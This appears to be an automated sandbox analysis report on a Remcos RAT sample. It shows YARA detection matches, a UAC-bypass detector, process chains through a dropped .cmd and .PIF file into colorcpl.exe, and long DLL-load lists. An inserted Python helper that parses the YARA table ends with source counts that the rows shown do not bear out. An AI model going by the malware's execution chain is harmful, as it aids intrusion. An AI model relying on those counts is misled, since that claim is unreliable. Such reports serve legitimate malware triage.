Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
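The Yara table above repeats the full metadata of the same three rules for every unpacked PE and memory dump that matched, which hides the actual finding: three rules, nine sources, all of them regions of colorcpl.exe (PID 828). The Python below is an added example, not part of the Joe Sandbox report or of any tool the report describes. It parses rows in the report's raw row format and collapses them into one metadata dictionary per rule plus the list of sources that hit it. The one non-obvious point it handles is that the metadata is a flat "key = value, key = value" list whose values can themselves contain commas (scan_context = file, memory; the REMCOS_RAT_variants Description), so it splits only where a new "key = " begins. The sample rows are copied from this report; the row regex and the summary layout are this example's own.

```python
import re

# Constructed input: rows copied from this report's Yara match table. A raw row glues
# the source cell to the literal "Matched rule:" text; the example also accepts the
# " | " separator used once the table is cleaned up.
SAMPLE_ROWS = r"""
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows executables potentially bypassing UAC using eventvwr.exe
Source: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 828, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
"""

# The type cell is upper-case and may be glued to "Matched"; the regex backtracks
# from "UNPACKEDPEM" to "UNPACKEDPE" so the literal "Matched rule:" can match.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.*?), type: (?P<type>[A-Z]+)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# Split only at ", " that is immediately followed by a new "key = " token, so commas
# inside a value (e.g. "scan_context = file, memory") stay where they are.
KV_SPLIT = re.compile(r", (?=[A-Za-z_]\w* = )")


def parse_meta(meta):
    """'k = v, k2 = v2' -> {'k': 'v', 'k2': 'v2'}, preserving commas inside values."""
    out = {}
    for seg in KV_SPLIT.split(meta):
        if " = " in seg:
            key, value = seg.split(" = ", 1)
            out[key.strip()] = value.strip()
    return out


def parse_row(line):
    """One table row -> dict with source, type, rule and parsed metadata, or None."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    return {"source": m["source"], "type": m["type"],
            "rule": m["rule"], "meta": parse_meta(m["meta"])}


def summarize(text):
    """Group matches by rule: metadata stated once, plus every (type, source) that hit it."""
    by_rule = {}
    for line in text.strip().splitlines():
        row = parse_row(line)
        if row is None:
            continue
        entry = by_rule.setdefault(row["rule"], {"meta": row["meta"], "sources": []})
        entry["sources"].append((row["type"], row["source"]))
    return by_rule


if __name__ == "__main__":
    for rule, entry in summarize(SAMPLE_ROWS).items():
        print(f"{rule}: {len(entry['sources'])} source(s)")
        for kind, src in entry["sources"]:
            print(f"    [{kind}] {src}")
```

On the full table this yields Windows_Trojan_Remcos_b296e965 with nine sources and the other two rules with eight each, which is the summary a triager actually wants from this section: the Remcos payload is present in the unpacked regions at 0x4A80000 and 0x68D0000 of colorcpl.exe and in its string dump.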
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@14/6@5/3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A95C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B37F5A GetDiskFreeSpaceA
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B4ABD8 CreateToolhelp32Snapshot
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Code function: 0_2_02B46D50 CoCreateInstance
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A99493 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A98C2E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | File created: C:\Users\Public\WnbcdrjtF.cmd
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-L3FHGJ
Source: Yara match | File source: MeP66xi1AM.exe, type: SAMPLE
Source: Yara match | File source: 0.0.MeP66xi1AM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2176891397.000000007EBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2113194413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\Public\Libraries\Wnbcdrjt.PIF, type: DROPPED
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MeP66xi1AM.exe | ReversingLabs: Detection: 52%
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | File read: C:\Users\user\Desktop\MeP66xi1AM.exe
Source: unknown | Process created: C:\Users\user\Desktop\MeP66xi1AM.exe "C:\Users\user\Desktop\MeP66xi1AM.exe"
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: unknown | Process created: C:\Users\Public\Libraries\Wnbcdrjt.PIF "C:\Users\Public\Libraries\Wnbcdrjt.PIF"
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Wnbcdrjt.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: url.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: winhttpcom.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ??????????.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ??.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ??l.dll
Source: C:\Users\user\Desktop\MeP66xi1AM.exe | Section loaded: ??l.dll
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???e???????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ???.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ????.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: ??l.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: tquery.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: endpointdlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: advapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: spp.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppwmi.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppcext.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: winscard.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sti.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: version.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: url.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: userenv.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: netutils.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: amsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winmm.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wininet.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: wldp.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: profapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??????????.dllJump to behavior
              Source: C:\Users\Public\Libraries\Wnbcdrjt.PIFSection loaded: ??.dllJump to behavior
